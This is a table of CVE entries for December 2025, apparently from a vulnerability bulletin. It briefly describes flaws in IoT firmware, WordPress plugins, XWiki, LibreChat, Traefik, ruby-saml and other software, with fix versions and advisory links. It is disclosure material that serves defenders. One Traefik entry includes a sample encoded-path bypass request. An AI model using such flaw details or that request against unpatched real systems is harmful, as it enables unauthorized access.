| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | The ESP32 system on a chip (SoC) that powers the Meatmeet basestation device was found to lack Secure Boot. The Secure Boot feature ensures that only authenticated software can execute on the device. The Secure Boot process forms a chain of trust by verifying all mutable software entities involved in the Application Startup Flow. As a result, an attacker with physical access to the device can flash modified firmware to the device, resulting in the execution of malicious code upon startup. | 2025-12-10 | not yet calculated | CVE-2025-65829 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Secure-Boot-Disabled.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-secure-boot-disabled-md |
| n/a--Meatmeet Pro Mobile Application v1.1.2.0 | Due to a lack of certificate validation, all traffic from the mobile application can be intercepted. As a result, an adversary located "upstream" can decrypt the TLS traffic, inspect its contents, and modify the requests in transit. This may result in a total compromise of the user's account if the attacker intercepts a request with active authentication tokens or cracks the MD5 hash sent on login. | 2025-12-10 | not yet calculated | CVE-2025-65830 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Lack-of-Certificate-Pinning.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-lack-of-certificate-pinning-md |
| n/a--Meatmeet Pro Mobile Application v1.1.2.0 | The application uses an insecure hashing algorithm (MD5) to hash passwords. If an attacker obtained a copy of these hashes, either through exploiting cloud services, performing TLS downgrade attacks on the traffic from a mobile device, or through another means, they may be able to crack the hash in a reasonable amount of time and gain unauthorized access to the victim's account. | 2025-12-10 | not yet calculated | CVE-2025-65831 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Insecure-Algorithm.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-lack-of-certificate-pinning-md |
| n/a--Meatmeet Pro Mobile Application v1.1.2.0 | The mobile application insecurely handles information stored within memory. By performing a memory dump on the application after a user has logged out and terminated it, Wi-Fi credentials sent during the pairing process, JWTs used for authentication, and other sensitive details can be retrieved. As a result, an attacker with physical access to the device of a victim can retrieve this information and gain unauthorized access to their home Wi-Fi network and Meatmeet account. | 2025-12-10 | not yet calculated | CVE-2025-65832 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Sensitive%20Information-Stored-in-Memory.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-sensitive-information-stored-in-memory-md |
| n/a--MineAdmin v3.x | Insecure permissions in the scheduled tasks feature of MineAdmin v3.x allow attackers to execute arbitrary commands and perform a full account takeover. | 2025-12-12 | not yet calculated | CVE-2025-65854 | http://mineadmin.com https://www.mineadmin.com/ https://gist.github.com/SourByte05/1a6c6b08ac47c5d58eb7dd4422cc23b7 |
| n/a--openmptcprouter thru 0.64 | An issue was discovered in openmptcprouter thru 0.64 in file common/package/utils/sys-upgrade-helper/src/tools/sysupgrade.c in function create_xor_ipad_opad allowing attackers to potentially write arbitrary files or execute arbitrary commands. | 2025-12-09 | not yet calculated | CVE-2025-65882 | http://openmptcprouter.com https://github.com/Ysurac/openmptcprouter/commit/09393d1c41a227bea7d5b85c0a06221b1302b25f https://gist.github.com/AradCohen/939ee50d60c4d2bd555a364615a5ab9c |
| WBCE--WBCE_CMS | WBCE CMS is a content management system. In versions 1.6.4 and below, the user management module allows a low-privileged authenticated user with permissions to modify users to execute arbitrary SQL queries. This can be escalated to a full database compromise and data exfiltration, effectively bypassing all security controls. The vulnerability exists in the admin/users/save.php script, which handles updates to user profiles. The script improperly processes the groups[] parameter sent from the user edit form. This issue is fixed in version 1.6.5. | 2025-12-10 | not yet calculated | CVE-2025-65950 | https://github.com/WBCE/WBCE_CMS/security/advisories/GHSA-934v-xhx9-j2f3 https://github.com/WBCE/WBCE_CMS/commit/96046178f4c80cf16f7c224054dec7fdadddda7e https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.5 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Versions 0.123.1 through 1.119.1 do not have adequate protections to prevent RCE through the project's pre-commit hooks. The Add Config operation allows workflows to set arbitrary Git configuration values, including core.hooksPath, which can point to a malicious Git hook that executes arbitrary commands on the n8n host during subsequent Git operations. Exploitation requires the ability to create or modify an n8n workflow using the Git node. This issue is fixed in version 1.119.2. Workarounds include excluding the Git Node (Docs) and avoiding cloning or interacting with untrusted repositories using the Git Node. | 2025-12-08 | not yet calculated | CVE-2025-65964 | https://github.com/n8n-io/n8n/security/advisories/GHSA-wpqc-h9wp-chmq https://github.com/n8n-io/n8n/commit/d5a1171f95f75def5c3ac577707ab913e22aef04 https://github.com/n8n-io/n8n/releases/tag/n8n%401.119.2 https://n8n-docs.teamlab.info/hosting/securing/blocking-nodes/#exclude-nodes |
| FreePBX--security-reporting | FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. Versions are vulnerable to authentication bypass when the authentication type is set to "webserver." When providing an Authorization header with an arbitrary value, a session is associated with the target user regardless of valid credentials. This issue is fixed in versions 16.0.44 and 17.0.23. | 2025-12-09 | not yet calculated | CVE-2025-66039 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-9jvh-mv6x-w698 https://github.com/FreePBX/framework/commit/04224253156543cd9932b90458660b2f19fc0e35#diff-72f14a52840a61504a8e03cd195035b44e488aecd634b001bc6412a04bdc940bR20-R50 https://www.freepbx.org/watch-what-we-do-with-security-fixes-%f0%9f%91%80 |
| WBCE--WBCE_CMS | WBCE CMS is a content management system. Version 1.6.4 contains a brute-force protection bypass where an attacker can indefinitely reset the counter by modifying `X-Forwarded-For` on each request, gaining unlimited password guessing attempts, effectively bypassing all brute-force protection. The application fully trusts the `X-Forwarded-For` header without validating it or restricting its usage. This issue is fixed in version 1.6.5. | 2025-12-08 | not yet calculated | CVE-2025-66204 | https://github.com/WBCE/WBCE_CMS/security/advisories/GHSA-f676-f375-m7mw https://github.com/WBCE/WBCE_CMS/commit/3765baddf27f31bbbea9c0228c452268621b25e5 https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.5 |
| ELECOM CO.,LTD.--Clone for Windows | Clone for Windows provided by ELECOM CO.,LTD. registers a Windows service with an unquoted file path. A user with the write permission on the root directory of the system drive may execute arbitrary code with SYSTEM privilege. | 2025-12-09 | not yet calculated | CVE-2025-66271 | https://www.elecom.co.jp/news/security/20251209-01/ https://jvn.jp/en/jp/JVN33172708/ |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Stored cross-site scripting vulnerabilities exist in GroupSession Free edition prior to ver5.7.1, GroupSession byCloud prior to ver5.7.1, and GroupSession ZION prior to ver5.7.1. A logged-in user can prepare a malicious page or URL, and an arbitrary script may be executed on the web browser when another user accesses it. | 2025-12-12 | not yet calculated | CVE-2025-66284 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| n/a--cPanel 110 through 132 | An issue was discovered in cPanel 110 through 132. A directory traversal vulnerability within the Team Manager API allows for overwrite of an arbitrary file. This can allow for privilege escalation to the root user. | 2025-12-11 | not yet calculated | CVE-2025-66429 | https://docs.cpanel.net/release-notes/release-notes/ https://docs.cpanel.net/changelogs/126-change-log/ |
| n/a--Plesk 18.0 | Plesk 18.0 has Incorrect Access Control. | 2025-12-12 | not yet calculated | CVE-2025-66430 | https://docs.plesk.com/release-notes/obsidian/whats-new/ https://support.plesk.com/hc/en-us/articles/36261922405015--CVE-2025-66430-Security-vulnerability-in-Password-Protected-Directories-allows-Plesk-users-to-gain-root-level-access-to-a-Plesk-server |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. In versions 0.8.0 and below, when a user posts a question, the iconURL parameter of the POST request can be modified by an attacker. The malicious code is then stored in the chat which can then be shared to other users. When sharing chats with a potentially malicious "tracker", resources loaded can lead to loss of privacy for users who view the chat link that is sent to them. This issue is fixed in version 0.8.1. | 2025-12-11 | not yet calculated | CVE-2025-66450 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-84vx-vmcf-xgpp https://github.com/danny-avila/LibreChat/commit/6fa94d3eb8f5779363226d10dccf8b01a735744c |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. In versions 0.8.0 and below, when creating prompts, JSON requests are sent to define and modify the prompts via PATCH endpoint for prompt groups (/api/prompts/groups/:groupId). However, the request bodies are not sufficiently validated for proper input, enabling users to modify prompts in a way that was not intended as part of the front end system. The patchPromptGroup function passes req.body directly to updatePromptGroup() without filtering sensitive fields. This issue is fixed in version 0.8.1. | 2025-12-11 | not yet calculated | CVE-2025-66451 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-vpqq-5qr4-655h https://github.com/danny-avila/LibreChat/commit/01413eea3d3c1454d32ca9704fa9640407839737 |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. In versions 0.8.0 and below, there is no handler for JSON parsing errors; SyntaxError from express.json() includes user input in the error message, which gets reflected in responses. User input (including HTML/JavaScript) can be exposed in error responses, creating an XSS risk if Content-Type isn't strictly enforced. This issue does not have a fix at the time of publication. | 2025-12-11 | not yet calculated | CVE-2025-66452 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-q6c5-gvj5-c264 |
| elysiajs--elysia | Elysia is a Typescript framework for request validation, type inference, OpenAPI documentation and client-server communication. Versions 1.4.0 through 1.4.16 contain a prototype pollution vulnerability in `mergeDeep` after merging results of two standard schema validations with the same key. Due to the ordering of merging, there must be an any type that is set as a standalone guard, to allow for the `__proto__` prop to be merged. When combined with GHSA-8vch-m3f4-q8jf this allows for a full RCE by an attacker. This issue is fixed in version 1.4.17. To workaround, remove the `__proto__` key from body. | 2025-12-09 | not yet calculated | CVE-2025-66456 | https://github.com/elysiajs/elysia/security/advisories/GHSA-hxj9-33pp-j2cc https://github.com/elysiajs/elysia/security/advisories/GHSA-8vch-m3f4-q8jf https://github.com/elysiajs/elysia/pull/1564 https://github.com/elysiajs/elysia/commit/26935bf76ebc43b4a43d48b173fc853de43bb51e https://github.com/elysiajs/elysia/commit/3af978663e437dccc6c1a2a3aff4b74e1574849e |
| elysiajs--elysia | Elysia is a Typescript framework for request validation, type inference, OpenAPI documentation and client-server communication. Versions 1.4.17 and below are subject to arbitrary code execution from cookie config. When dynamic cookies are enabled (e.g. there is an existing cookie schema), the cookie config is injected into the compiled route without first being sanitised. Availability of this exploit is generally low, but when combined with GHSA-hxj9-33pp-j2cc, it allows for a full RCE chain. An attack requires write access to either the Elysia app's source code (in which case the vulnerability is meaningless) or write access to the cookie config (perhaps where it is assumed to be provisioned by the environment). This issue is fixed in version 1.4.18. | 2025-12-09 | not yet calculated | CVE-2025-66457 | https://github.com/elysiajs/elysia/security/advisories/GHSA-8vch-m3f4-q8jf https://github.com/elysiajs/elysia/security/advisories/GHSA-hxj9-33pp-j2cc https://github.com/elysiajs/elysia/pull/1564 https://github.com/elysiajs/elysia/commit/26935bf76ebc43b4a43d48b173fc853de43bb51e https://github.com/elysiajs/elysia/commit/3af978663e437dccc6c1a2a3aff4b74e1574849e |
| GS Yuasa International Ltd.--FULLBACK Manager Pro (for Windows) | FULLBACK Manager Pro provided by GS Yuasa International Ltd. registers two Windows services with unquoted file paths. A user who has write permission on the path to the directory where the affected product is installed may execute arbitrary code with SYSTEM privilege. | 2025-12-08 | not yet calculated | CVE-2025-66461 | https://ps.gs-yuasa.com/technicalinfo/pdf/failure/FMP_info20251201_TEX48214-993.pdf https://jvn.jp/en/jp/JVN59242986/ |
| xwiki--xwiki-platform | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Versions 6.2-milestone-1 through 16.10.9 and 17.0.0-rc-1 through 17.4.1 of both XWiki Platform Flamingo Skin Resources and XWiki Platform Web Templates are vulnerable to a reflected XSS attack through a deletion confirmation message. The attacker-supplied script is executed when the victim clicks the "No" button. This issue is fixed in versions 16.10.10 and 17.4.2 of both XWiki Platform Flamingo Skin Resources and XWiki Platform Web Templates. | 2025-12-10 | not yet calculated | CVE-2025-66472 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7vpr-jm38-wr7w https://github.com/xwiki/xwiki-platform/commit/cb578b1b2910d06e9dd7581077072d1cfbd280f2 https://jira.xwiki.org/browse/XWIKI-23244 |
| xwiki--xwiki-platform | XWiki is an open-source wiki software platform. Versions 16.10.10 and below, 17.0.0-rc-1 through 17.4.3 and 17.5.0-rc-1 through 17.6.0 contain a REST API which doesn't enforce any limits for the number of items that can be requested in a single request at the moment. Depending on the number of pages in the wiki and the memory configuration, this can lead to slowness and unavailability of the wiki. As an example, the /rest/wikis/xwiki/spaces resource returns all spaces on the wiki by default, which are basically all pages. This issue is fixed in versions 17.4.4 and 16.10.11. | 2025-12-10 | not yet calculated | CVE-2025-66473 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-cc84-q3v3-mhgf https://github.com/xwiki/xwiki-platform/commit/e3c47745195fb445b054537be86f5c01ee69558b https://jira.xwiki.org/browse/XWIKI-23355 |
| xwiki--xwiki-rendering | XWiki Rendering is a generic rendering system that converts textual input in a given syntax (wiki syntax, HTML, etc) into another syntax (XHTML, etc). Versions 16.10.9 and below, 17.0.0-rc-1 through 17.4.2 and 17.5.0-rc-1 through 17.5.0 have insufficient protection against {{/html}} injection, which attackers can exploit to achieve RCE. Any user who can edit their own profile or any other document can execute arbitrary script macros, including Groovy and Python macros, which enable remote code execution as well as unrestricted read and write access to all wiki contents. This issue is fixed in versions 16.10.10, 17.4.3 and 17.6.0-rc-1. | 2025-12-10 | not yet calculated | CVE-2025-66474 | https://github.com/xwiki/xwiki-rendering/security/advisories/GHSA-9xc6-c2rm-f27p https://github.com/xwiki/xwiki-platform/commit/12b780ccd5bca5fc8f74f46648d7e02fa04fbc11 https://github.com/xwiki/xwiki-rendering/commit/9b71a2ee035815cfc29cebbfe81dbdd98f941d49 https://jira.xwiki.org/browse/XRENDERING-693 https://jira.xwiki.org/browse/XRENDERING-792 https://jira.xwiki.org/browse/XRENDERING-793 https://jira.xwiki.org/browse/XWIKI-23378 |
| traefik--traefik | Traefik is an HTTP reverse proxy and load balancer. For versions prior to 2.11.32 and 2.11.31 through 3.6.2, requests using PathPrefix, Path or PathRegex matchers can bypass path normalization. When Traefik uses path-based routing, requests containing URL-encoded restricted characters (/, \, Null, ;, ?, #) can bypass the middleware chain and reach unintended backends. For example, a request to http://mydomain.example.com/admin%2F could reach service-a without triggering my-security-middleware, bypassing security controls for the /admin/ path. This issue is fixed in versions 2.11.32 and 3.6.3. | 2025-12-09 | not yet calculated | CVE-2025-66490 | https://github.com/traefik/traefik/security/advisories/GHSA-gm3x-23wp-hc2c https://github.com/traefik/traefik/releases/tag/v2.11.32 https://github.com/traefik/traefik/releases/tag/v3.6.4 |
| Elastic Email--Elastic Email Sender | Missing Authorization vulnerability in Elastic Email Elastic Email Sender elastic-email-sender allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Elastic Email Sender: from n/a through <= 1.2.20. | 2025-12-09 | not yet calculated | CVE-2025-66525 | https://vdp.patchstack.com/database/Wordpress/Plugin/elastic-email-sender/vulnerability/wordpress-elastic-email-sender-plugin-1-2-20-broken-access-control-vulnerability?_s_id=cve |
| Essekia--Tablesome | Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tablesome: from n/a through <= 1.1.34. | 2025-12-09 | not yet calculated | CVE-2025-66526 | https://vdp.patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-34-broken-access-control-vulnerability?_s_id=cve |
| VanKarWai--Lobo | Missing Authorization vulnerability in VanKarWai Lobo lobo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Lobo: from n/a through <= 2.8.6. | 2025-12-09 | not yet calculated | CVE-2025-66527 | https://vdp.patchstack.com/database/Wordpress/Theme/lobo/vulnerability/wordpress-lobo-theme-2-8-6-broken-access-control-vulnerability?_s_id=cve |
| VillaTheme--Thank You Page Customizer for WooCommerce | Missing Authorization vulnerability in VillaTheme Thank You Page Customizer for WooCommerce woo-thank-you-page-customizer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Thank You Page Customizer for WooCommerce: from n/a through <= 1.1.8. | 2025-12-09 | not yet calculated | CVE-2025-66528 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-customizer/vulnerability/wordpress-thank-you-page-customizer-for-woocommerce-plugin-1-1-8-broken-access-control-vulnerability?_s_id=cve |
| Ays Pro--Chartify | Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Chartify chart-builder allows Cross Site Request Forgery. This issue affects Chartify: from n/a through <= 3.6.3. | 2025-12-09 | not yet calculated | CVE-2025-66529 | https://vdp.patchstack.com/database/Wordpress/Plugin/chart-builder/vulnerability/wordpress-chartify-plugin-3-6-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Webba Appointment Booking--Webba Booking | Missing Authorization vulnerability in Webba Appointment Booking Webba Booking webba-booking-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Webba Booking: from n/a through <= 6.2.1. | 2025-12-09 | not yet calculated | CVE-2025-66530 | https://vdp.patchstack.com/database/Wordpress/Plugin/webba-booking-lite/vulnerability/wordpress-webba-booking-plugin-6-2-1-broken-access-control-vulnerability?_s_id=cve |
| Dimitri Grassi--Salon booking system | Cross-Site Request Forgery (CSRF) vulnerability in Dimitri Grassi Salon booking system salon-booking-system allows Cross Site Request Forgery. This issue affects Salon booking system: from n/a through <= 10.30.3. | 2025-12-09 | not yet calculated | CVE-2025-66531 | https://vdp.patchstack.com/database/Wordpress/Plugin/salon-booking-system/vulnerability/wordpress-salon-booking-system-plugin-10-30-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Mikado-Themes--Powerlift | Missing Authorization vulnerability in Mikado-Themes Powerlift powerlift allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Powerlift: from n/a through < 3.2.1. | 2025-12-09 | not yet calculated | CVE-2025-66532 | https://vdp.patchstack.com/database/Wordpress/Theme/powerlift/vulnerability/wordpress-powerlift-theme-3-2-1-broken-access-control-vulnerability?_s_id=cve |
| StellarWP--GiveWP | Improper Control of Generation of Code ('Code Injection') vulnerability in StellarWP GiveWP give allows Code Injection. This issue affects GiveWP: from n/a through <= 4.13.1. | 2025-12-09 | not yet calculated | CVE-2025-66533 | https://vdp.patchstack.com/database/Wordpress/Plugin/give/vulnerability/wordpress-givewp-plugin-4-13-1-arbitrary-shortocde-execution-vulnerability?_s_id=cve |
| Elated-Themes--The Aisle | Missing Authorization vulnerability in Elated-Themes The Aisle theaisle allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Aisle: from n/a through <= 2.9. | 2025-12-09 | not yet calculated | CVE-2025-66534 | https://vdp.patchstack.com/database/Wordpress/Theme/theaisle/vulnerability/wordpress-the-aisle-theme-2-9-broken-access-control-vulnerability?_s_id=cve |
| gofiber--utils | Fiber Utils is a collection of common functions created for Fiber. In versions 2.0.0-rc.3 and below, when the system's cryptographic random number generator (crypto/rand) fails, both functions silently fall back to returning predictable UUID values, including the zero UUID "00000000-0000-0000-0000-000000000000". The vulnerability occurs through two related but distinct failure paths, both ultimately caused by crypto/rand.Read() failures, compromising the security of all Fiber applications using these functions for security-critical operations. This issue is fixed in version 2.0.0-rc.4. | 2025-12-09 | not yet calculated | CVE-2025-66565 | https://github.com/gofiber/utils/security/advisories/GHSA-m98w-cqp3-qcqr https://github.com/gofiber/utils/commit/6c6cf047032b9c8dff43d29f990b4b10e9b02d47 |
| SAML-Toolkits--ruby-saml | The ruby-saml library implements the service-provider (client) side of SAML. ruby-saml versions up to and including 1.12.4 contain an authentication bypass vulnerability due to an incomplete fix for CVE-2025-25292. ReXML and Nokogiri parse XML differently, generating entirely different document structures from the same input, which allows an attacker to execute a Signature Wrapping attack. This issue is fixed in version 1.18.0. | 2025-12-09 | not yet calculated | CVE-2025-66567 | https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-9v8j-x534-2fx3 https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97 https://github.com/advisories/GHSA-754f-8gm6-c4r2 |
| SAML-Toolkits--ruby-saml | The ruby-saml library implements the service-provider (client) side of SAML. Versions up to and including 1.12.4 are vulnerable to authentication bypass through the libxml2 canonicalization process used by Nokogiri for document transformation, which allows an attacker to execute a Signature Wrapping attack. When libxml2's canonicalization is invoked on an invalid XML input, it may return an empty string rather than a canonicalized node; ruby-saml then computes the DigestValue over this empty string, treating it as if canonicalization had succeeded. This issue is fixed in version 1.18.0. | 2025-12-09 | not yet calculated | CVE-2025-66568 | https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-x4h9-gwv3-r4m4 https://github.com/SAML-Toolkits/ruby-saml/commit/acac9e9cc0b9a507882c614f25d41f8b47be349a |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), a Stack-Based Buffer Overflow vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process. | 2025-12-11 | not yet calculated | CVE-2025-66584 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), a Use After Free vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process. | 2025-12-11 | not yet calculated | CVE-2025-66585 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Resource Using Incompatible Type vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process. | 2025-12-11 | not yet calculated | CVE-2025-66586 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), the affected application is vulnerable to memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process. | 2025-12-11 | not yet calculated | CVE-2025-66587 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Uninitialized Pointer vulnerability can be exploited by an attacker which can lead to arbitrary code execution. | 2025-12-11 | not yet calculated | CVE-2025-66588 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), an Out-of-bounds Read vulnerability can be exploited by an attacker to cause the program to read data past the end of an allocated buffer. This could allow an attacker to disclose information or cause a system crash. | 2025-12-11 | not yet calculated | CVE-2025-66589 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), an Out-of-bounds Write vulnerability can be exploited by an attacker to cause the program to write data past the end of an allocated memory buffer. This can lead to arbitrary code execution or a system crash. | 2025-12-11 | not yet calculated | CVE-2025-66590 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| matrix-org--matrix-rust-sdk | matrix-sdk-base is the base component used to build a Matrix client library. Versions 0.14.1 and prior are unable to handle responses that include custom m.room.join_rules values due to a serialization bug. This can be exploited to cause a denial-of-service condition: if a user is invited to a room with non-standard join rules, the crate's sync process stalls, preventing further processing for all rooms. This is fixed in version 0.16.0. | 2025-12-09 | not yet calculated | CVE-2025-66622 | https://github.com/matrix-org/matrix-rust-sdk/security/advisories/GHSA-jj6p-3m75-g2p3 https://github.com/matrix-org/matrix-rust-sdk/pull/5924 https://github.com/matrix-org/matrix-rust-sdk/commit/4ea0418abefab2aa93f8851a4d39c723e703e6b0 https://rustsec.org/advisories/RUSTSEC-2025-0135.html |
| MarimerLLC--csla | CSLA .NET is a framework designed for the development of reusable, object-oriented business layers for applications. Versions 5.5.4 and below allow the use of WcfProxy. WcfProxy uses the now-obsolete NetDataContractSerializer (NDCS) and is vulnerable to remote code execution during deserialization. This vulnerability is fixed in version 6.0.0. To work around this issue, remove the WcfProxy from data portal configurations. | 2025-12-09 | not yet calculated | CVE-2025-66631 | https://github.com/MarimerLLC/csla/security/advisories/GHSA-wq34-7f4g-953v https://github.com/MarimerLLC/csla/issues/4001 https://github.com/MarimerLLC/csla/pull/4018 |
| Apache Software Foundation--Apache Struts | Denial of Service vulnerability in Apache Struts: a file leak in multipart request processing causes disk exhaustion. This issue affects Apache Struts: from 2.0.0 through 6.7.4, and from 7.0.0 through 7.0.3. Users are recommended to upgrade to version 6.8.0 or 7.1.1, which fixes the issue. It is related to CVE-2025-64775 (https://cve.org/CVERecord?id=CVE-2025-64775); this CVE adds the previously missing affected version 6.7.4. | 2025-12-10 | not yet calculated | CVE-2025-66675 | https://cwiki.apache.org/confluence/display/WW/S2-068 https://cve.org/CVERecord?id=CVE-2025-64775 |
| n/a--edoc-doctor-appointment-system v1.0.1 | edoc-doctor-appointment-system v1.0.1 is vulnerable to Cross Site Scripting (XSS) in admin/add-session.php via the "title" parameter. | 2025-12-11 | not yet calculated | CVE-2025-66918 | https://github.com/HashenUdara/edoc-doctor-appointment-system https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66918/readme.md |
| n/a--jshERP versions 3.5 and earlier | jshERP versions 3.5 and earlier are affected by a stored XSS vulnerability. This vulnerability allows attackers to upload PDF files containing XSS payloads. Additionally, these PDF files can be accessed via static URLs, making them accessible to all users. | 2025-12-12 | not yet calculated | CVE-2025-67341 | https://github.com/jishenghua/jshERP/issues/139 |
| n/a--RuoYi versions 4.8.1 and earlier | RuoYi versions 4.8.1 and earlier are affected by a stored XSS vulnerability in the /system/menu/edit endpoint. While the endpoint is protected by an XSS filter, the protection can be bypassed. Additionally, because the menu is shared across all users, any user with menu modification permissions can impact all users by exploiting this stored XSS vulnerability. | 2025-12-12 | not yet calculated | CVE-2025-67342 | https://github.com/yangzongzhuan/RuoYi/issues/308 |
| n/a--jshERP v3.5 and earlier | jshERP v3.5 and earlier are affected by a stored Cross Site Scripting (XSS) vulnerability via the /msg/add endpoint. | 2025-12-12 | not yet calculated | CVE-2025-67344 | https://github.com/jishenghua/jshERP/issues/140 |
| QuantumCloud--Simple Link Directory | Cross-Site Request Forgery (CSRF) vulnerability in QuantumCloud Simple Link Directory simple-link-directory allows Cross Site Request Forgery. This issue affects Simple Link Directory: from n/a through <= 8.8.3. | 2025-12-09 | not yet calculated | CVE-2025-67465 | https://vdp.patchstack.com/database/Wordpress/Plugin/simple-link-directory/vulnerability/wordpress-simple-link-directory-plugin-8-8-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| sergiotrinity--Trinity Audio | Missing Authorization vulnerability in sergiotrinity Trinity Audio trinity-audio allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Trinity Audio: from n/a through <= 5.23.3. | 2025-12-09 | not yet calculated | CVE-2025-67466 | https://vdp.patchstack.com/database/Wordpress/Plugin/trinity-audio/vulnerability/wordpress-trinity-audio-plugin-5-23-3-broken-access-control-vulnerability?_s_id=cve |
| StellarWP--GiveWP | Cross-Site Request Forgery (CSRF) vulnerability in StellarWP GiveWP give allows Cross Site Request Forgery. This issue affects GiveWP: from n/a through <= 4.13.1. | 2025-12-09 | not yet calculated | CVE-2025-67467 | https://vdp.patchstack.com/database/Wordpress/Plugin/give/vulnerability/wordpress-givewp-plugin-4-13-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| CRM Perks--Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms | Missing Authorization vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms cf7-salesforce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms: from n/a through <= 1.4.6. | 2025-12-09 | not yet calculated | CVE-2025-67468 | https://vdp.patchstack.com/database/Wordpress/Plugin/cf7-salesforce/vulnerability/wordpress-integration-for-salesforce-and-contact-form-7-wpforms-elementor-formidable-ninja-forms-plugin-1-4-6-broken-access-control-vulnerability?_s_id=cve |
| kubiq--PDF Thumbnail Generator | Cross-Site Request Forgery (CSRF) vulnerability in kubiq PDF Thumbnail Generator pdf-thumbnail-generator allows Cross Site Request Forgery. This issue affects PDF Thumbnail Generator: from n/a through <= 1.4. | 2025-12-09 | not yet calculated | CVE-2025-67469 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-thumbnail-generator/vulnerability/wordpress-pdf-thumbnail-generator-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Essential Plugin--Portfolio and Projects | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Essential Plugin Portfolio and Projects portfolio-and-projects allows Retrieve Embedded Sensitive Data. This issue affects Portfolio and Projects: from n/a through <= 1.5.5. | 2025-12-09 | not yet calculated | CVE-2025-67470 | https://vdp.patchstack.com/database/Wordpress/Plugin/portfolio-and-projects/vulnerability/wordpress-portfolio-and-projects-plugin-1-5-5-sensitive-data-exposure-vulnerability?_s_id=cve |
| Saad Iqbal--Quick Contact Form | Cross-Site Request Forgery (CSRF) vulnerability in Saad Iqbal Quick Contact Form quick-contact-form allows Cross Site Request Forgery. This issue affects Quick Contact Form: from n/a through <= 8.2.5. | 2025-12-09 | not yet calculated | CVE-2025-67471 | https://vdp.patchstack.com/database/Wordpress/Plugin/quick-contact-form/vulnerability/wordpress-quick-contact-form-plugin-8-2-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
